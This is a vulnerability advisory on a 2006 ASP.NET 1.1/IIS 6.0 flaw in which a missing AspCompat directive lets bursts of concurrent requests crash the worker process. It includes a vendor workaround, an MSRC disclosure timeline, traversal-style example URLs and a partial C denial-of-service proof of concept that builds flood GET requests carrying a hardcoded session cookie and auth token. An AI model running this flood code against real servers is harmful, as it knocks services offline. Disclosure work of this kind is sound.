Vulnerable Systems:
* Windows 2003 (SP1) + IIS 6.0 + .NET Framework 1.1 Windows XP Professional Edition + IIS 6.0 + .NET Framework 1.1
Missing AspCompat directive causes general instability and poor performance of the web application, just a simple increase of load on a web server may cause it to crash.
If simultaneous requests are made to the webserver for atleast 100 - 300 for each URL that references COM components and restricted files (within the application directory path) then the worker process fails or crash at any particular instant.
Example: http://<Domain>/asp-app\web.config
http://<Domain>/asp-app\default.aspx (sample links with reference to any COM component) http://<Domain>/asp-app\..\aspapplogs/log1.log
Workaround:
ASP-intrinsic objects (like STA COM components) are not enabled in ASP.NET by default, and in ASP.NET, the thread pool is a multithreaded apartment (MTA) by default. So, to use the COM components effectively these defaults should be explicitly changed by using the following attribute in the @Page directive:
<%@Page ASPCompat="true" %>
This directive causes ASP.NET to provide access to ASP-intrinsic objects and changes the thread pool to STA. It is observed that after addition of this directive, the issue gets resolved.
Disclosure Timeline:
1/10/2006 - Bug reported to the vendor
1/11/2006 - MSRC acknowledged and assigned a case number 6367
1/12/2006 - Vendor requested for additional info
1/12/2006 - Vendor provided with additional info
1/24/2006 - Vendor requested for stack dump
1/27/2006 - Stack dump was provided to vendor
2/02/2006 - Vendor requested for a re-test with the a temporary fix applied
2/10/2006 - Issue re-tested with the fix applied and the test failed
2/18/2006 - Vendor confirmed the issue and suggested the fix.
2/23/2006 - Vendor requested to get the security advisory passed via the MSRC before releasing.
3/14/2006 - Vendor provided with the draft version of the advisory
3/16/2006 - Vendor reviewed the advisory and suggested minor changes
3/21/2006 - Vendor provided with the updated advisory with the necessary changes made
3/21/2006 - Vendor granted permission to release the advisory
3/21/2006 - Public Disclosure
int iRetval;
if((iRetval = WSAStartup(0x202,&wsaData)) != 0) {
printf( "WSAStartup failed with error %d\n",iRetval);
WSACleanup(); exit(1); }
// Make a check on the length of the parameter provided
if (strlen(argv[1]) > MAX_PATH) {
printf( "Too long parameter ....\n"); exit(1); }
else
strcpy(pszTargetHost, argv[1]);
// Resolve the hostname into IP address or vice-versa
if(isalpha(pszTargetHost[0]))
phostent = gethostbyname(pszTargetHost);
else {
uAddr = inet_addr(pszTargetHost);
phostent = gethostbyaddr((char *)&uAddr,4,AF_INET);
if(phostent != NULL)
wsprintf( pszTargetHost, "[+] %s", phostent->h_name);
else {
printf( "Failed to resolve IP address, please provide host name.\n" );
WSACleanup();
exit(1);
}
}
/* Modify the list of links given below to your asp.net links. The list should carry links which refer to any COM components and as well as other restricted links under the asp.net app path. */
/* Prepare the GET request for the desired link */
strcpy(szGetReqH, szBuff[dwIndex]);
strcat(szGetReqH, " HTTP/1.1\r\n");
strcat(szGetReqH, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n");
strcat(szGetReqH, "Accept-Language: en-us\r\n");
strcat(szGetReqH, "Accept-Encoding: gzip, deflate\r\n");
strcat(szGetReqH, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)\r\n");
strcat(szGetReqH, "Host: \r\n" );
strcat(szGetReqH, "Connection: Keep-Alive\r\n" );
/* Insert a valid Session Cookie and ASPVIEWSTATE to get more effective result */
strcat(szGetReqH, "Cookie: ASP.NET_SessionId=35i2i02dtybpvvjtog4lh0ri;\r\n" );
strcat(szGetReqH, ".ASPXAUTH=6DCE135EFC40CAB2A3B839BF21012FC6C619EB88C866A914ED9F49D67B0D01135F744632F1CC480589912023FA6D703BF02680BE6D733518A998AD1BE1FCD082F1CBC4DB54870BFE76AC713AF05B971D\r\n\r\n" );
